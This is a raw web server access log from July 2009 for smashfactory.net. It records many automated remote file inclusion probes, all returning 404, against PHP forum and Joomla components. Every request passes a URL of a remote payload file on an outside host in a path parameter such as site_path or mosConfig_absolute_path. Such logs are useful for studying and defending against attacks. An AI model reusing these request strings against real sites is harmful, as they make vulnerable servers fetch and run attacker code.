211.202.2.220 - - [04/Jul/2009:20:50:21 -0700] "GET /logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.kcorea.co.kr:8080/~kcorea//lib/a1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
211.202.2.220 - - [04/Jul/2009:20:50:21 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.kcorea.co.kr:8080/~kcorea//lib/a1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
211.202.2.220 - - [04/Jul/2009:20:50:21 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.kcorea.co.kr:8080/~kcorea//lib/a1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
211.202.2.220 - - [04/Jul/2009:20:50:45 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.kcorea.co.kr:8080/~kcorea//lib/a1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
211.202.2.220 - - [04/Jul/2009:20:50:45 -0700] "GET /logs/access.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.kcorea.co.kr:8080/~kcorea//lib/a1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
211.202.2.220 - - [04/Jul/2009:20:50:45 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.kcorea.co.kr:8080/~kcorea//lib/a1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
200.105.207.244 - - [04/Jul/2009:20:51:30 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.celaf.edu.bo/biblioteca/pepek.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
200.105.207.244 - - [04/Jul/2009:20:51:30 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.celaf.edu.bo/biblioteca/pepek.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
200.105.207.244 - - [04/Jul/2009:20:51:30 -0700] "GET /logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.celaf.edu.bo/biblioteca/pepek.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
83.98.209.71 - - [04/Jul/2009:20:55:48 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.aboutav.com//harap/di.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.smashfactory.net"
203.151.217.29 - - [04/Jul/2009:21:00:03 -0700] "GET /logs//gnuboard4/index.php?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
203.151.217.29 - - [04/Jul/2009:21:00:03 -0700] "GET /gnuboard4/index.php?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
203.151.217.29 - - [04/Jul/2009:21:00:03 -0700] "GET /logs/access.log%20%20//gnuboard4/index.php?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
211.202.2.220 - - [04/Jul/2009:21:00:11 -0700] "GET /logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.kcorea.co.kr:8080/~kcorea//lib/a1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
211.202.2.220 - - [04/Jul/2009:21:00:11 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.kcorea.co.kr:8080/~kcorea//lib/a1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
211.202.2.220 - - [04/Jul/2009:21:00:11 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.kcorea.co.kr:8080/~kcorea//lib/a1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
203.151.217.29 - - [04/Jul/2009:21:12:26 -0700] "GET /logs/access.log//gnuboard4/index.php?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
218.38.136.251 - - [04/Jul/2009:21:17:10 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://personel.trakya.edu.tr/media_yedek/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
218.38.136.251 - - [04/Jul/2009:21:17:12 -0700] "GET /logs/access.log%20%20//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://personel.trakya.edu.tr/media_yedek/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
218.38.136.251 - - [04/Jul/2009:21:17:12 -0700] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://personel.trakya.edu.tr/media_yedek/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
83.98.209.71 - - [04/Jul/2009:21:19:21 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.aboutav.com//harap/di.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.smashfactory.net"
83.98.209.71 - - [04/Jul/2009:21:19:21 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.aboutav.com//harap/di.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.smashfactory.net"
83.98.209.71 - - [04/Jul/2009:21:19:22 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.aboutav.com//harap/di.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.smashfactory.net"
82.151.132.176 - - [04/Jul/2009:21:35:58 -0700] "GET /logs/access.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
82.151.132.176 - - [04/Jul/2009:21:35:58 -0700] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
82.151.132.176 - - [04/Jul/2009:21:35:58 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
83.98.209.71 - - [04/Jul/2009:21:46:32 -0700] "GET /logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
83.98.209.71 - - [04/Jul/2009:21:46:32 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
83.98.209.71 - - [04/Jul/2009:21:46:35 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
83.98.209.71 - - [04/Jul/2009:21:46:35 -0700] "GET /logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
83.98.209.71 - - [04/Jul/2009:21:46:35 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
83.98.209.71 - - [04/Jul/2009:21:46:36 -0700] "GET /logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
83.98.209.71 - - [04/Jul/2009:21:46:36 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
83.98.209.71 - - [04/Jul/2009:21:46:36 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
195.34.78.110 - - [04/Jul/2009:21:46:49 -0700] "GET /logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
195.34.78.110 - - [04/Jul/2009:21:46:49 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
195.34.78.110 - - [04/Jul/2009:21:46:49 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
195.34.78.110 - - [04/Jul/2009:21:46:49 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
195.34.78.110 - - [04/Jul/2009:21:46:50 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
195.34.78.110 - - [04/Jul/2009:21:46:50 -0700] "GET /logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
195.34.78.110 - - [04/Jul/2009:21:46:55 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
195.34.78.110 - - [04/Jul/2009:21:46:55 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
195.34.78.110 - - [04/Jul/2009:21:46:55 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
195.34.78.110 - - [04/Jul/2009:21:46:55 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
195.34.78.110 - - [04/Jul/2009:21:46:55 -0700] "GET /logs/access.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
195.34.78.110 - - [04/Jul/2009:21:46:56 -0700] "GET /logs/access.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
218.38.136.251 - - [04/Jul/2009:22:03:25 -0700] "GET /logs/access.log%20%20//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://personel.trakya.edu.tr/media_yedek/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
66.71.241.146 - - [04/Jul/2009:22:06:05 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://hbulonline.com/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.smashfactory.net"
66.71.241.146 - - [04/Jul/2009:22:06:05 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://hbulonline.com/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.smashfactory.net"
66.71.241.146 - - [04/Jul/2009:22:06:06 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://hbulonline.com/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.smashfactory.net"
66.71.241.146 - - [04/Jul/2009:22:10:03 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://hbulonline.com/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.smashfactory.net"
218.208.21.7 - - [04/Jul/2009:22:19:14 -0700] "GET /logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://163.17.8.18//appserv/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "smashfactory.net"
218.208.21.7 - - [04/Jul/2009:22:19:14 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://163.17.8.18//appserv/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "smashfactory.net"
218.208.21.7 - - [04/Jul/2009:22:19:16 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://163.17.8.18//appserv/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "smashfactory.net"
60.43.229.5 - - [04/Jul/2009:22:56:46 -0700] "GET /include/lib.inc.php?site_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
60.43.229.5 - - [04/Jul/2009:22:56:46 -0700] "GET /logs/include/lib.inc.php?site_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
60.43.229.5 - - [04/Jul/2009:22:56:46 -0700] "GET /logs/access.log%20%20/include/lib.inc.php?site_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
60.43.229.5 - - [04/Jul/2009:23:04:51 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
60.43.229.5 - - [04/Jul/2009:23:09:40 -0700] "GET /logs/access.log%20%20//citywriter/head.php?path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
60.43.229.5 - - [04/Jul/2009:23:09:40 -0700] "GET /citywriter/head.php?path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
60.43.229.5 - - [04/Jul/2009:23:09:40 -0700] "GET /logs//citywriter/head.php?path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
60.43.229.5 - - [04/Jul/2009:23:15:40 -0700] "GET /logs/access.log//citywriter/head.php?path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
218.208.21.7 - - [04/Jul/2009:23:24:45 -0700] "GET /logs/access.log///include/mail.inc.php?skin_board_path=http://163.17.8.18//appserv/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.smashfactory.net"
218.208.21.7 - - [04/Jul/2009:23:24:46 -0700] "GET /logs///include/mail.inc.php?skin_board_path=http://163.17.8.18//appserv/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.smashfactory.net"
218.208.21.7 - - [04/Jul/2009:23:24:51 -0700] "GET //include/mail.inc.php?skin_board_path=http://163.17.8.18//appserv/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.smashfactory.net"
195.34.78.110 - - [04/Jul/2009:23:32:36 -0700] "GET /logs///include/mail.inc.php?skin_board_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
195.34.78.110 - - [04/Jul/2009:23:32:36 -0700] "GET //include/mail.inc.php?skin_board_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
195.34.78.110 - - [04/Jul/2009:23:32:36 -0700] "GET /logs/access.log%20%20///include/mail.inc.php?skin_board_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
195.34.78.110 - - [04/Jul/2009:23:32:39 -0700] "GET /logs/access.log%20%20///include/mail.inc.php?skin_board_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
195.34.78.110 - - [04/Jul/2009:23:32:39 -0700] "GET /logs///include/mail.inc.php?skin_board_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
195.34.78.110 - - [04/Jul/2009:23:32:39 -0700] "GET //include/mail.inc.php?skin_board_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
65.23.158.226 - - [04/Jul/2009:23:32:42 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
65.23.158.226 - - [04/Jul/2009:23:32:42 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
65.23.158.226 - - [04/Jul/2009:23:32:42 -0700] "GET /logs/access.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
65.23.158.226 - - [04/Jul/2009:23:34:47 -0700] "GET /logs/access.log%20%20//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
218.234.21.178 - - [04/Jul/2009:23:35:37 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
218.234.21.178 - - [04/Jul/2009:23:35:37 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
218.234.21.178 - - [04/Jul/2009:23:35:37 -0700] "GET /logs/access.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
195.34.78.110 - - [04/Jul/2009:23:42:09 -0700] "GET /logs/access.log///include/mail.inc.php?skin_board_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
195.34.78.110 - - [04/Jul/2009:23:42:40 -0700] "GET /logs/access.log///include/mail.inc.php?skin_board_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
67.208.139.72 - - [04/Jul/2009:23:44:02 -0700] "GET /logs/access.log%20%20//include/mail.inc.php?skin_board_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
67.208.139.72 - - [04/Jul/2009:23:44:02 -0700] "GET /include/mail.inc.php?skin_board_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
67.208.139.72 - - [04/Jul/2009:23:44:02 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
67.208.139.72 - - [04/Jul/2009:23:46:43 -0700] "GET /logs/access.log//include/mail.inc.php?skin_board_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
60.43.229.5 - - [05/Jul/2009:00:00:25 -0700] "GET /include/lib.inc.php?site_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
60.43.229.5 - - [05/Jul/2009:00:00:25 -0700] "GET /logs/access.log%20%20/include/lib.inc.php?site_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
60.43.229.5 - - [05/Jul/2009:00:00:25 -0700] "GET /logs/include/lib.inc.php?site_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
195.34.78.110 - - [05/Jul/2009:00:08:59 -0700] "GET /include/bbs.lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
195.34.78.110 - - [05/Jul/2009:00:08:59 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
195.34.78.110 - - [05/Jul/2009:00:08:59 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
195.34.78.110 - - [05/Jul/2009:00:09:11 -0700] "GET /include/bbs.lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
195.34.78.110 - - [05/Jul/2009:00:09:11 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
195.34.78.110 - - [05/Jul/2009:00:09:11 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
60.43.229.5 - - [05/Jul/2009:00:09:47 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
211.115.213.35 - - [05/Jul/2009:00:16:40 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
211.115.213.35 - - [05/Jul/2009:00:16:41 -0700] "GET /logs/include/lib.inc.php?site_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
211.115.213.35 - - [05/Jul/2009:00:16:41 -0700] "GET /include/lib.inc.php?site_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
88.191.37.60 - - [05/Jul/2009:00:19:40 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
88.191.37.60 - - [05/Jul/2009:00:19:40 -0700] "GET /logs/access.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
88.191.37.60 - - [05/Jul/2009:00:19:40 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
88.191.37.60 - - [05/Jul/2009:00:20:13 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
88.191.37.60 - - [05/Jul/2009:00:20:13 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
88.191.37.60 - - [05/Jul/2009:00:20:17 -0700] "GET /logs/access.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
218.38.136.251 - - [05/Jul/2009:00:21:51 -0700] "GET /include/admin.lib.inc.php?site_path=http://personel.trakya.edu.tr/media_yedek/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
218.38.136.251 - - [05/Jul/2009:00:21:51 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://personel.trakya.edu.tr/media_yedek/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
218.38.136.251 - - [05/Jul/2009:00:21:52 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://personel.trakya.edu.tr/media_yedek/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
195.34.78.110 - - [05/Jul/2009:00:27:57 -0700] "GET /logs/access.log%20%20//include/bbs.lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
88.191.37.60 - - [05/Jul/2009:00:28:48 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
88.191.37.60 - - [05/Jul/2009:00:28:53 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
